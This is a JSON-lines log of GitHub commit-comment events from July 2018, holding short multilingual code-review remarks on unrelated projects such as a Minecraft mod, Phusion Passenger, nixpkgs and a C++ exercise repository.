{"id":"7988293819","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/source-repo-20180719103159512"},"payload":{"comment":{"id":29762436,"position":1,"line":null,"path":"README.md","commit_id":"6ffbd47cdef92921fa1ab75051530f2458a355fa","created_at":"2018-07-19T10:32:12Z","updated_at":"2018-07-19T10:32:12Z","author_association":"OWNER","body":"I am a nice comment"}},"created_at":"2018-07-19T10:32:12Z"}
{"id":"7988297727","type":"CommitCommentEvent","actor":{"login":"kochedykov"},"repo":{"name":"kochedykov/jlibmodbus"},"payload":{"comment":{"id":29762443,"position":107,"line":107,"path":"examples/com/invertor/examples/modbus/SimpleSlaveTCP.java","commit_id":"9bc4059167a9877834993d483a1073f40f0fa3a3","created_at":"2018-07-19T10:33:02Z","updated_at":"2018-07-19T10:33:02Z","author_association":"OWNER","body":"Yes, please."}},"created_at":"2018-07-19T10:33:02Z"}
{"id":"7988299771","type":"CommitCommentEvent","actor":{"login":"Polikovskiy"},"repo":{"name":"Polikovskiy/heroes"},"payload":{"comment":{"id":29762449,"position":null,"line":null,"path":null,"commit_id":"5aa781a7114791bf60fbbf8b8dfbf0838572d6a1","created_at":"2018-07-19T10:33:27Z","updated_at":"2018-07-19T10:33:27Z","author_association":"OWNER","body":"remote comments"}},"created_at":"2018-07-19T10:33:27Z"}
{"id":"7988303597","type":"CommitCommentEvent","actor":{"login":"miconos4"},"repo":{"name":"WMEValidator/i18n"},"payload":{"comment":{"id":29762455,"position":19,"line":19,"path":"IT.js","commit_id":"101aa02eca9c81d88cb6cd78a80be032e06a2cb0","created_at":"2018-07-19T10:34:14Z","updated_at":"2018-07-19T10:34:14Z","author_association":"NONE","body":"\"city.consider\": 'considera questo nome città:',\r\n\"city.1\": 'nome città troppo corto',\r\n\"city.2\": 'espandi l' abbreviazione',\r\n\"city.3\": 'completa il nome',\r\n\"city.4\": 'completa il nome città',\r\n\"city.5\": 'correggi la alettera maiuscola',\r\n\"city.6\": 'controlla l'ordine delle parole',\r\n\"city.7\": 'controlla le abbreviazioni',\r\n\"city.8a\": 'aggiungi il nome della nazione',\r\n\"city.8r\": 'cancella il nome della nazione',\r\n\"city.9\": 'controlla il nome della nazione',\r\n\"city.10a\": 'aggiungi un parola',\r\n\"city.10r\": 'remuovi una parola',\r\n\"city.11\": 'aggiungi il codice nazione',\r\n\"city.12\": 'stesso nome, ma differente ID delle città',\r\n\"city.13a\": 'aggiungi uno spazio',\r\n\"city.13r\": 'remuovi uno spazio',\r\n\"city.14\": 'controlla il numero',"}},"created_at":"2018-07-19T10:34:14Z"}
{"id":"7988311077","type":"CommitCommentEvent","actor":{"login":"frederic-klein"},"repo":{"name":"modell-aachen/WorkflowAppPlugin"},"payload":{"comment":{"id":29762475,"position":12,"line":38,"path":"lib/Foswiki/Plugins/WorkflowAppPlugin/Assets/templates/WorkflowAppTemplateForEditTemplate.txt","commit_id":"71752d4251fda87a4a1f65033546a5b257f19347","created_at":"2018-07-19T10:35:53Z","updated_at":"2018-07-19T10:35:53Z","author_association":"CONTRIBUTOR","body":"@StephanOsthold laut Kommentar in der Story: \"Attachments can only be added after the first topic save.\" Habt ihr das abgestimmt?"}},"created_at":"2018-07-19T10:35:53Z"}
{"id":"7988311368","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29762476,"position":null,"line":null,"path":null,"commit_id":"8d9b0c7aad57fced327c187135b0ab89a6e24ffc","created_at":"2018-07-19T10:35:57Z","updated_at":"2018-07-19T10:35:57Z","author_association":"COLLABORATOR","body":"浅田\r\n配列も宣言時に初期化しましょう。"}},"created_at":"2018-07-19T10:35:57Z"}
{"id":"7988311932","type":"CommitCommentEvent","actor":{"login":"renzh163"},"repo":{"name":"renzh163/hello-renzh"},"payload":{"comment":{"id":29762477,"position":null,"line":null,"path":null,"commit_id":"99e6c45eb820f5dcdc3d4fc610ee904e0f77618b","created_at":"2018-07-19T10:36:06Z","updated_at":"2018-07-19T10:36:06Z","author_association":"OWNER","body":"特特特特特"}},"created_at":"2018-07-19T10:36:06Z"}
{"id":"7988313410","type":"CommitCommentEvent","actor":{"login":"winex"},"repo":{"name":"ldtteam/minecolonies"},"payload":{"comment":{"id":29762482,"position":21,"line":42,"path":"src/main/java/com/minecolonies/coremod/entity/ai/citizen/guard/EntityAIKnight.java","commit_id":"c024298b7b51d76155a70fcff1dd74770c658d51","created_at":"2018-07-19T10:36:24Z","updated_at":"2018-07-19T10:36:24Z","author_association":"CONTRIBUTOR","body":"i believe here and at :46 should be `EntityEquipmentSlot.OFFHAND`, right?\r\nbecause `MAINHAND` is used by `toolsNeeded` with the sword"}},"created_at":"2018-07-19T10:36:24Z"}
{"id":"7988313641","type":"CommitCommentEvent","actor":{"login":"winex"},"repo":{"name":"ldtteam/minecolonies"},"payload":{"comment":{"id":29762483,"position":25,"line":46,"path":"src/main/java/com/minecolonies/coremod/entity/ai/citizen/guard/EntityAIKnight.java","commit_id":"c024298b7b51d76155a70fcff1dd74770c658d51","created_at":"2018-07-19T10:36:27Z","updated_at":"2018-07-19T10:36:27Z","author_association":"CONTRIBUTOR","body":"same as above :42, OFFHAND"}},"created_at":"2018-07-19T10:36:27Z"}
{"id":"7988315156","type":"CommitCommentEvent","actor":{"login":"mwiciigi"},"repo":{"name":"mwiciigi/tpa"},"payload":{"comment":{"id":29762486,"position":null,"line":null,"path":null,"commit_id":"8bc93fc7c429c80078cc3cc4ab2ad852008e8f80","created_at":"2018-07-19T10:36:46Z","updated_at":"2018-07-19T10:36:46Z","author_association":"OWNER","body":"to be master"}},"created_at":"2018-07-19T10:36:46Z"}
{"id":"7988316357","type":"CommitCommentEvent","actor":{"login":"FooBarWidget"},"repo":{"name":"phusion/passenger"},"payload":{"comment":{"id":29762490,"position":null,"line":null,"path":null,"commit_id":"0766bb303ad8009c6061206f3aafe231c4f1c3ff","created_at":"2018-07-19T10:37:01Z","updated_at":"2018-07-19T10:37:01Z","author_association":"MEMBER","body":"@lijingjie I spent the past few weeks analyzing this problem. This has been confirmed to be a Passenger problem. Furthermore, the \"HTTP header size exceeded maximum\" error messages are not a seperate issues after all, but are related to the issue of improperly handling chunked request bodies in case 'PassengerBufferUploads' is set to 'off'. Please see https://github.com/phusion/passenger/issues/2102"}},"created_at":"2018-07-19T10:37:01Z"}
{"id":"7988319230","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29762499,"position":14,"line":17,"path":"pkgs/development/libraries/libuv/default.nix","commit_id":"620238009444730c3ad5aa419248fa698626f49a","created_at":"2018-07-19T10:37:39Z","updated_at":"2018-07-19T10:37:39Z","author_association":"CONTRIBUTOR","body":"````\r\nfixed-output derivation produced path '/nix/store/ahc297f8s4h56qyjdj5h5lcw81b6m66d-1909.patch' with sha256 hash '0zbblj99zkgm9ssqjlf3c9hrnh9pmqxsqbqnvyx1lkcrc0pqjb7s' instead of the expected hash '1s2692h4dvqnzwwicrkpj0zph1i2bhv39w31z5vh7ssgvykaradj'\r\n````"}},"created_at":"2018-07-19T10:37:39Z"}
{"id":"7988323224","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29762504,"position":null,"line":null,"path":null,"commit_id":"4cc69fc9a216220d4c57bbabad91dd3b5a2276d4","created_at":"2018-07-19T10:38:32Z","updated_at":"2018-07-19T10:38:32Z","author_association":"COLLABORATOR","body":"浅田\r\n配列要素も宣言時に初期化してあげましょう。"}},"created_at":"2018-07-19T10:38:32Z"}
{"id":"7988323478","type":"CommitCommentEvent","actor":{"login":"zhenxing1992"},"repo":{"name":"zhenxing1992/Shale-oil-and-gas"},"payload":{"comment":{"id":29762505,"position":null,"line":null,"path":null,"commit_id":"c31e6fcc07c0ed0d6504f483992156671eba48c2","created_at":"2018-07-19T10:38:36Z","updated_at":"2018-07-19T10:38:36Z","author_association":"OWNER","body":"Requirement"}},"created_at":"2018-07-19T10:38:36Z"}
{"id":"7988325761","type":"CommitCommentEvent","actor":{"login":"bestwebua"},"repo":{"name":"AlekseyZaytcev/rg_codebreaker-web"},"payload":{"comment":{"id":29762508,"position":null,"line":null,"path":null,"commit_id":"d2c58725c96ba8371a1d8b6790382b6fc700d0ba","created_at":"2018-07-19T10:39:06Z","updated_at":"2018-07-19T10:39:06Z","author_association":"NONE","body":"Все паршалы должны именоваться по следющему соглашению: _partial_name.extension.erb"}},"created_at":"2018-07-19T10:39:06Z"}
{"id":"7988326876","type":"CommitCommentEvent","actor":{"login":"frederic-klein"},"repo":{"name":"modell-aachen/WorkflowAppPlugin"},"payload":{"comment":{"id":29762509,"position":6,"line":90,"path":"locale/WorkflowAppPlugin/de.po","commit_id":"71752d4251fda87a4a1f65033546a5b257f19347","created_at":"2018-07-19T10:39:20Z","updated_at":"2018-07-19T10:39:20Z","author_association":"CONTRIBUTOR","body":"@StephanOsthold siehe oben: laut Kommentar in UserStory: \"Das Hinzufügen von Anhängen ist erst nach dem erstmaligen Speichern der Seite verfügbar.\""}},"created_at":"2018-07-19T10:39:20Z"}
{"id":"7988332751","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29762522,"position":27,"line":27,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T10:40:37Z","updated_at":"2018-07-19T10:40:37Z","author_association":"OWNER","body":"странное с вашей стороны утверждение ..)) Это выглядит \"придиркой\" на\r\nровном месте..и вообще тут обсуждать-то нечего..\r\nЯ же писал так: b/2/a , а это вычисляется слева направо ..\r\nпример b=20, a=5\r\n сначала вычислится b/2 получится 10, а затем этот результат раделится на\r\nа=5 . т.е. 10/a = 2\r\nчто собственно и будет если записывать это так b/(2*a) !\r\nэто вообще даже не спор..\r\nа требование написать алгоритм строго  в соответствии формул  не было !\r\nя их даже не смотрел..т.к. эту азбуку еще в школе выучил на отлично..\r\nда и еще есть  принцип - не умножать подряд если, без этого можно обойтись..\r\nкак в данном примере.\r\n\r\n\r\n2018-07-19 12:11 GMT+03:00 Vlad Filiucov <notifications@github.com>:\r\n\r\n> [image: screen shot 2018-07-19 at 12 10 15 pm]\r\n> <https://user-images.githubusercontent.com/8184396/42933164-c4182fb4-8b4c-11e8-99f5-25aadb5ca68d.png>\r\n> там 2 умножить на а, а не делить.\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/DmitriKudriashov/learning/commit/9cde866269fb0ed380c5e534e7cc48e6e7153318#commitcomment-29761381>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AaExI8o30Ar1PZ24qVm2kQpNy_U-83NXks5uIE1CgaJpZM4VVeiE>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-19T10:40:37Z"}
{"id":"7988337308","type":"CommitCommentEvent","actor":{"login":"renzh163"},"repo":{"name":"renzh163/hello-renzh"},"payload":{"comment":{"id":29762528,"position":null,"line":null,"path":null,"commit_id":"f73b3337207cac854d57e9e295f0c7cb5e0adeb0","created_at":"2018-07-19T10:41:37Z","updated_at":"2018-07-19T10:41:37Z","author_association":"OWNER","body":"日发售的"}},"created_at":"2018-07-19T10:41:37Z"}
{"id":"7988347424","type":"CommitCommentEvent","actor":{"login":"joshimmaraj"},"repo":{"name":"JoannaRMIT/GanjaSommelier2"},"payload":{"comment":{"id":29762550,"position":null,"line":null,"path":null,"commit_id":"6d231ce59171ed029e6ac398a7910608564fe093","created_at":"2018-07-19T10:43:45Z","updated_at":"2018-07-19T10:43:45Z","author_association":"COLLABORATOR","body":"$ git reset --hard 6d231ce"}},"created_at":"2018-07-19T10:43:45Z"}
{"id":"7988351205","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29762556,"position":null,"line":null,"path":null,"commit_id":"e08ae2a8a51ac603133474340a0f7b35a27279ba","created_at":"2018-07-19T10:44:33Z","updated_at":"2018-07-19T10:44:33Z","author_association":"COLLABORATOR","body":"浅田\r\n配列も宣言時に初期化しましょう。"}},"created_at":"2018-07-19T10:44:33Z"}
{"id":"7988352866","type":"CommitCommentEvent","actor":{"login":"hannesm"},"repo":{"name":"mirage/ocaml-conduit"},"payload":{"comment":{"id":29762559,"position":null,"line":null,"path":null,"commit_id":"1eb76d226268ab2b2bbed79e8897713b749a43ee","created_at":"2018-07-19T10:44:55Z","updated_at":"2018-07-19T10:44:55Z","author_association":"MEMBER","body":"while going through the stack, it occurs to me that the interface (`module Handler`) should maybe be lifted to the MirageOS3 error handling -- atm both `connect` and `listen` in there are using the `Lwt.t` for errors as well as for input/output effects -- whereas in MirageOS3 we use in flow etc. `-> (t, err) result Lwt.t`.  NB: this is mainly a historic note as a reminder once we have a redesign, see https://github.com/mirage/mirage/issues/882 "}},"created_at":"2018-07-19T10:44:55Z"}
{"id":"7988353336","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29762560,"position":26,"line":26,"path":"lesson1/optimal_weight.rb","commit_id":"53df4e000e3331f345f6e574886491558ad711cb","created_at":"2018-07-19T10:45:01Z","updated_at":"2018-07-19T10:45:01Z","author_association":"NONE","body":"Да, это codestyle, причём никак не связанный с ruby. \r\n\r\nЕсли ты заметишь, github каждый такой файл отмечает двумя красными символами "}},"created_at":"2018-07-19T10:45:01Z"}
{"id":"7988355805","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29762569,"position":null,"line":null,"path":null,"commit_id":"546c6721c3f902d18bea5565ed4708979ea61522","created_at":"2018-07-19T10:45:33Z","updated_at":"2018-07-19T10:45:33Z","author_association":"MEMBER","body":"I think we should change it to false, we have too much old code that fails this condition."}},"created_at":"2018-07-19T10:45:33Z"}
{"id":"7988357507","type":"CommitCommentEvent","actor":{"login":"alxmiron"},"repo":{"name":"HiTask/react-big-calendar"},"payload":{"comment":{"id":29762573,"position":5,"line":203,"path":"src/DayColumn.js","commit_id":"4de64a10573e3754df3e3f99440746ae701b180a","created_at":"2018-07-19T10:45:54Z","updated_at":"2018-07-19T10:45:54Z","author_association":"NONE","body":"@MichaelLonin I think it's better to make changes as less as possible to avoid conflicts from upstream"}},"created_at":"2018-07-19T10:45:54Z"}
{"id":"7988358088","type":"CommitCommentEvent","actor":{"login":"joshimmaraj"},"repo":{"name":"JoannaRMIT/GanjaSommelier2"},"payload":{"comment":{"id":29762575,"position":null,"line":null,"path":null,"commit_id":"0b8c14ecec6610203c987cdea8e24ff242c1caaf","created_at":"2018-07-19T10:46:01Z","updated_at":"2018-07-19T10:46:01Z","author_association":"COLLABORATOR","body":"''$ git reset --hard 6d231ce"}},"created_at":"2018-07-19T10:46:01Z"}
{"id":"7988359321","type":"CommitCommentEvent","actor":{"login":"Micha0"},"repo":{"name":"gamehouse-playfab/delicious-world-dev"},"payload":{"comment":{"id":29762576,"position":197,"line":498,"path":"level.js","commit_id":"9cc1ed296e01f43b9d5d08fe9b0d513ad1f0957c","created_at":"2018-07-19T10:46:16Z","updated_at":"2018-07-19T10:46:16Z","author_association":"COLLABORATOR","body":"Removal of this line causes players not be able to progress"}},"created_at":"2018-07-19T10:46:16Z"}
{"id":"7988360359","type":"CommitCommentEvent","actor":{"login":"ahoy-jon"},"repo":{"name":"UNIVALENCE/Zoom"},"payload":{"comment":{"id":29762578,"position":9,"line":11,"path":"modele-macros/src/main/scala/zoom/callsite/CallSiteMacro.scala","commit_id":"8e6ec824dd1cf1b617b38c5f73d918d7c9f902fd","created_at":"2018-07-19T10:46:30Z","updated_at":"2018-07-19T10:46:30Z","author_association":"NONE","body":"dans notre cas c'est ```blackbox.Context``` ! "}},"created_at":"2018-07-19T10:46:30Z"}
{"id":"7988361430","type":"CommitCommentEvent","actor":{"login":"joshimmaraj"},"repo":{"name":"JoannaRMIT/GanjaSommelier2"},"payload":{"comment":{"id":29762581,"position":null,"line":null,"path":null,"commit_id":"0b8c14ecec6610203c987cdea8e24ff242c1caaf","created_at":"2018-07-19T10:46:44Z","updated_at":"2018-07-19T10:46:44Z","author_association":"COLLABORATOR","body":"`git reset --hard 6d231ce'"}},"created_at":"2018-07-19T10:46:44Z"}
{"id":"7988362847","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29762583,"position":7,"line":407,"path":"src/server/game/Handlers/SpellHandler.cpp","commit_id":"8a4858bdcfba5b2c9fca27869db72704af39c2e6","created_at":"2018-07-19T10:47:02Z","updated_at":"2018-07-19T10:47:02Z","author_association":"MEMBER","body":"@ariel- @Shauren can I get your opinion on this todo?"}},"created_at":"2018-07-19T10:47:02Z"}
{"id":"7988362901","type":"CommitCommentEvent","actor":{"login":"mblue9"},"repo":{"name":"PMacDaSci/r-intro"},"payload":{"comment":{"id":29762584,"position":null,"line":null,"path":null,"commit_id":"e9138efedad5ea4a16f664a0a2633904fe68c645","created_at":"2018-07-19T10:47:03Z","updated_at":"2018-07-19T10:47:03Z","author_association":"NONE","body":"@mogranjm I've added Lucy's version of the Cambridge material to the course page here to have some notes for Week 3 available with the rest and they fit the format of the previous weeks. Let me know if not ok with you."}},"created_at":"2018-07-19T10:47:03Z"}
{"id":"7988364784","type":"CommitCommentEvent","actor":{"login":"i-shiryaev"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29762587,"position":39,"line":39,"path":"Lesson_3/station_control.rb","commit_id":"77e65be3dd5c3c0ae2d45dcba8be172bfa573189","created_at":"2018-07-19T10:47:27Z","updated_at":"2018-07-19T10:47:27Z","author_association":"OWNER","body":" Ок. Но есть ли в этом смысл, если инстанс переменная stations со списком и так открыта ридером?"}},"created_at":"2018-07-19T10:47:27Z"}
{"id":"7988367062","type":"CommitCommentEvent","actor":{"login":"Micha0"},"repo":{"name":"gamehouse-playfab/delicious-world-dev"},"payload":{"comment":{"id":29762593,"position":241,"line":482,"path":"level.js","commit_id":"9cc1ed296e01f43b9d5d08fe9b0d513ad1f0957c","created_at":"2018-07-19T10:47:58Z","updated_at":"2018-07-19T10:47:58Z","author_association":"COLLABORATOR","body":"Or hardcode levelId to 0, like you do 6 lines below"}},"created_at":"2018-07-19T10:47:58Z"}
{"id":"7988369288","type":"CommitCommentEvent","actor":{"login":"jimhester"},"repo":{"name":"r-lib/devtools"},"payload":{"comment":{"id":29762595,"position":null,"line":null,"path":null,"commit_id":"c509f1e07ad500ea5c76c92f8c372bd4cef0fc8c","created_at":"2018-07-19T10:48:28Z","updated_at":"2018-07-19T10:48:28Z","author_association":"MEMBER","body":"It certainly could, and would be safer, done in 02ea7183"}},"created_at":"2018-07-19T10:48:28Z"}
{"id":"7988371156","type":"CommitCommentEvent","actor":{"login":"timbgr"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29762599,"position":39,"line":39,"path":"lib/s390base.pm","commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-19T10:48:52Z","updated_at":"2018-07-19T10:48:52Z","author_association":"NONE","body":"I modified the code so now the sub looks like this, for passing the script name, arguments and timeout separately\r\n\r\nplease see if it's ok:\r\n`sub execute_script {`\r\n`    my ($self, $script, $scriptargs, $timeout) = @_;`\r\n `   assert_script_run (\"./$script $scriptargs  >$script.log 2>&1\",  timeout => $timeout);`\r\n`    save_screenshot;`\r\n`    upload_logs \"$script.log\";`\r\n`}`\r\n`"}},"created_at":"2018-07-19T10:48:52Z"}
{"id":"7988371574","type":"CommitCommentEvent","actor":{"login":"Startidea"},"repo":{"name":"Startidea/Startidea-Forum"},"payload":{"comment":{"id":29762601,"position":null,"line":null,"path":null,"commit_id":"ddace57f0a143a468ef29a40b4d291fd6af60660","created_at":"2018-07-19T10:48:58Z","updated_at":"2018-07-19T10:48:58Z","author_association":"OWNER","body":"Perfecto"}},"created_at":"2018-07-19T10:48:58Z"}
{"id":"7988373731","type":"CommitCommentEvent","actor":{"login":"haochenprophet"},"repo":{"name":"haochenprophet/iwant"},"payload":{"comment":{"id":29762608,"position":null,"line":null,"path":null,"commit_id":"6da7f8beb381c5319b4049f4f1366bb281e50887","created_at":"2018-07-19T10:49:26Z","updated_at":"2018-07-19T10:49:26Z","author_association":"OWNER","body":"The add_objects and dispatch_cmd changes the command line traditional processing mode . 哈哈哈!"}},"created_at":"2018-07-19T10:49:26Z"}
{"id":"7988388360","type":"CommitCommentEvent","actor":{"login":"Jildor"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29762627,"position":null,"line":null,"path":null,"commit_id":"8a4858bdcfba5b2c9fca27869db72704af39c2e6","created_at":"2018-07-19T10:52:38Z","updated_at":"2018-07-19T10:52:38Z","author_association":"CONTRIBUTOR","body":"Welcome back @Treeston 🍾 🎆 "}},"created_at":"2018-07-19T10:52:38Z"}
{"id":"7988389190","type":"CommitCommentEvent","actor":{"login":"xcguang"},"repo":{"name":"espressif/ESP8266_NONOS_SDK"},"payload":{"comment":{"id":29762630,"position":null,"line":null,"path":null,"commit_id":"c76613457be934856bc3bcfce7117eb00300e020","created_at":"2018-07-19T10:52:49Z","updated_at":"2018-07-19T10:52:49Z","author_association":"CONTRIBUTOR","body":"@ataweg Sorry, it is for load/store data in iram."}},"created_at":"2018-07-19T10:52:49Z"}
{"id":"7988397484","type":"CommitCommentEvent","actor":{"login":"TheCoolBrit"},"repo":{"name":"TheCoolBrit/hello-world"},"payload":{"comment":{"id":29762639,"position":null,"line":null,"path":null,"commit_id":"d136ebe3aa1bcbf03c3583fbdb4e047a06bc67a5","created_at":"2018-07-19T10:54:38Z","updated_at":"2018-07-19T10:54:38Z","author_association":"OWNER","body":"Nat Demo"}},"created_at":"2018-07-19T10:54:38Z"}
{"id":"7988398572","type":"CommitCommentEvent","actor":{"login":"haochenprophet"},"repo":{"name":"stockoperate/stockoperate"},"payload":{"comment":{"id":29762642,"position":null,"line":null,"path":null,"commit_id":"080a99a5b7a08caf33a2785760b7e6ad1c9dd3fd","created_at":"2018-07-19T10:54:53Z","updated_at":"2018-07-19T10:54:53Z","author_association":"CONTRIBUTOR","body":"C++ is amazing."}},"created_at":"2018-07-19T10:54:53Z"}
{"id":"7988403238","type":"CommitCommentEvent","actor":{"login":"haochenprophet"},"repo":{"name":"haochenprophet/iwant"},"payload":{"comment":{"id":29762647,"position":null,"line":null,"path":null,"commit_id":"ce539be39d9e7b1cdbf33da19246d376be53d6bf","created_at":"2018-07-19T10:55:54Z","updated_at":"2018-07-19T10:55:54Z","author_association":"OWNER","body":"C++ is amazing."}},"created_at":"2018-07-19T10:55:54Z"}
{"id":"7988403563","type":"CommitCommentEvent","actor":{"login":"cruddasj"},"repo":{"name":"InformedSolutions/OFS-MORE-Childminder-Website"},"payload":{"comment":{"id":29762648,"position":5,"line":58,"path":"govuk_template/templates/base.html","commit_id":"cc1622f117bcd6d7b777bf67c3d1b6b88607f2bf","created_at":"2018-07-19T10:55:58Z","updated_at":"2018-07-19T10:55:58Z","author_association":"CONTRIBUTOR","body":"Can we please revert this update? Effectively, we want to avoid modifying any links in the default GOV.UK template headers or footers."}},"created_at":"2018-07-19T10:55:58Z"}
{"id":"7988403899","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29762649,"position":36,"line":36,"path":"5-7/5-7.cpp","commit_id":"f7aab90053dfc614dec178da58d13f4238708b36","created_at":"2018-07-19T10:56:03Z","updated_at":"2018-07-19T10:56:03Z","author_association":"COLLABORATOR","body":"浅田\r\nコメントに誤りがあります。\r\n配列の値が1～10であるかどうかはこのループでは特に確認していないように見えます。\r\n"}},"created_at":"2018-07-19T10:56:03Z"}
{"id":"7988405644","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29762653,"position":24,"line":24,"path":"5-7/5-7.cpp","commit_id":"f7aab90053dfc614dec178da58d13f4238708b36","created_at":"2018-07-19T10:56:24Z","updated_at":"2018-07-19T10:56:24Z","author_association":"COLLABORATOR","body":"浅田\r\n配列の値も初期化しましょう。"}},"created_at":"2018-07-19T10:56:24Z"}
{"id":"7988414360","type":"CommitCommentEvent","actor":{"login":"cruddasj"},"repo":{"name":"InformedSolutions/OFS-MORE-Childminder-Website"},"payload":{"comment":{"id":29762664,"position":5,"line":58,"path":"govuk_template/templates/base.html","commit_id":"cc1622f117bcd6d7b777bf67c3d1b6b88607f2bf","created_at":"2018-07-19T10:58:21Z","updated_at":"2018-07-19T10:58:21Z","author_association":"CONTRIBUTOR","body":"For the avoidance of doubt, we want to focus external link use on links contained within application form guidance"}},"created_at":"2018-07-19T10:58:21Z"}
{"id":"7988416265","type":"CommitCommentEvent","actor":{"login":"cruddasj"},"repo":{"name":"InformedSolutions/OFS-MORE-Childminder-Website"},"payload":{"comment":{"id":29762667,"position":5,"line":58,"path":"govuk_template/templates/base.html","commit_id":"cc1622f117bcd6d7b777bf67c3d1b6b88607f2bf","created_at":"2018-07-19T10:58:47Z","updated_at":"2018-07-19T10:58:47Z","author_association":"CONTRIBUTOR","body":"@kingainformed, @Thomas-95IS, @LRydeard "}},"created_at":"2018-07-19T10:58:47Z"}
{"id":"7988417109","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29762670,"position":19,"line":19,"path":"5-8.cpp","commit_id":"8c02827568dafd107a5708ad820381bc11b412e3","created_at":"2018-07-19T10:58:58Z","updated_at":"2018-07-19T10:58:58Z","author_association":"COLLABORATOR","body":"浅田\r\nここはべた打ちではなく、配列の要素を活用して文字列を出力しましょう。\r\n配列の初期値が変更になった等の修正に強くなります。"}},"created_at":"2018-07-19T10:58:58Z"}
{"id":"7988424507","type":"CommitCommentEvent","actor":{"login":"sabeena21"},"repo":{"name":"Samsung/tizen-docs"},"payload":{"comment":{"id":29762693,"position":19,"line":813,"path":"docs/application/native/guides/internationalization/i18n.md","commit_id":"45aedf3f3263a105f4dd6121f9cdc407a620fea5","created_at":"2018-07-19T11:00:34Z","updated_at":"2018-07-19T11:00:34Z","author_association":"NONE","body":"Line 860:\r\n\r\nPlease can you change \"If there is no clause with that keyword, then the \"other\" clauses is returned.\"\r\n\r\nto \r\n\r\n\"If there is no clause with that keyword, then the `other` clauses is returned."}},"created_at":"2018-07-19T11:00:34Z"}
{"id":"7988424983","type":"CommitCommentEvent","actor":{"login":"phlindstedt"},"repo":{"name":"ecraft2learn/uui"},"payload":{"comment":{"id":29762694,"position":null,"line":null,"path":null,"commit_id":"ae8d889fd50b100036c389bbacfa4590c4c796ad","created_at":"2018-07-19T11:00:40Z","updated_at":"2018-07-19T11:00:40Z","author_association":"COLLABORATOR","body":"Updated from metro ui v3 to version 4\r\n\r\nSmall change in the html for the tiles. Windows are made when you start the application. Less code is needed for each tile. Add class no-mobile to a tile to hide it on mobile devices\r\n\r\nIssue #23 Search button on eCraft Search Tool - Fixed\r\n\r\nOther fixes:\r\n-Windows position and size for mobile\r\n-Able to move windows without scrolling on mobile\r\n-Help/information dialogs fixed size for mobile\r\n-eCraft2Learn logo / text no longer overlapping username/progress bar.\r\n-Changed the behavior of the UUI tools tile\r\n-Changed mobile width from 320px to 420px\r\n\r\nNew features:\r\n-Less applications are shown on mobile phones\r\n-Able to show all hidden applications on mobile (Press username and check the checkbox, only avaliable on phones/smaller screens)"}},"created_at":"2018-07-19T11:00:40Z"}
{"id":"7988431204","type":"CommitCommentEvent","actor":{"login":"gorhill"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29762707,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T11:02:00Z","updated_at":"2018-07-19T11:02:00Z","author_association":"MEMBER","body":"> For example:\r\n\r\nThat filter seize ABP on my side:\r\n\r\n![a](https://user-images.githubusercontent.com/585534/42938723-4187ab54-8b21-11e8-89bf-02b5b665d990.png)\r\n\r\nI disagree with how the `rewrite` option was designed (efficiency, correctness), and also that it's any useful at this point compared with what already exists in uBO, and furthermore.\r\n\r\nAnyways I asked about using sublist because I see you are already using uBO-specific syntax with the `style(...)` filters, these could go in the sublists as well -- unless ABP plans to parse them I supposed."}},"created_at":"2018-07-19T11:02:00Z"}
{"id":"7988431909","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29762709,"position":null,"line":null,"path":null,"commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-19T11:02:09Z","updated_at":"2018-07-19T11:02:09Z","author_association":"OWNER","body":"c'est grave de pas les mettre ?"}},"created_at":"2018-07-19T11:02:09Z"}
{"id":"7988433642","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"TheWalkingDelirium/spring01-hw"},"payload":{"comment":{"id":29762711,"position":23,"line":23,"path":".gitignore","commit_id":"9393cbf93d84ef2a884d709d1d096f480811fabc","created_at":"2018-07-19T11:02:30Z","updated_at":"2018-07-19T11:02:30Z","author_association":"NONE","body":"И ещё папку .idea/ нужно туда добавить и *.iml"}},"created_at":"2018-07-19T11:02:30Z"}
